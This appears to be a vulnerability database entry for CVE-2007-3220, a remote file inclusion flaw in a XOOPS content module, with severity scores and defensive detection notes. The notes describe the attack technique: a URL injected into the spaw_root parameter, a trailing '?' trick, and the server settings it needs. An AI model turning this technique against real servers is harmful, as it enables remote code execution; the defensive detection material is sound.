cbcvebase.
CVE-2007-3220
published 2007-06-14

CVE-2007-3220: PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute…

PriorityP349medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
62.75%
99.1th percentile
PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this may be a duplicate of CVE-2006-4656.

Affected

1 ranges
VendorProductVersion rangeFixed in
xoopscjay_content_module

Detection & IOCsextracted from sources · hover to see the quote

path/modules/cjaycontent/admin/editor2/spaw_control.class.php
pathadmin/editor2/spaw_control.class.php
  • Detect HTTP requests targeting spaw_control.class.php with a URL-based spaw_root parameter, indicating remote file inclusion attempt.
  • The trailing '?' appended to the injected shell URL is a classic RFI technique to nullify the remainder of the include path; look for query strings ending in '?' in the spaw_root parameter.
  • Exploitation requires register_globals=ON and magic_quotes=OFF; these server configurations should be flagged as high-risk in combination with this module's presence.
  • ·Exploitation is only possible when PHP register_globals is ON and magic_quotes is OFF — detections should account for this prerequisite environment.
  • ·This CVE may be a duplicate of CVE-2006-4656; correlate findings with that CVE to avoid double-counting incidents.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.